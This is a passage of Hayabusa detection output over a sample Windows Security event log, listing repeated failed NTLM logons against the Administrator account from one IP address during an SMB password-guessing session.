NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTCTTYmKTIzzJwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oD3dLxlB3qWIhZEQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
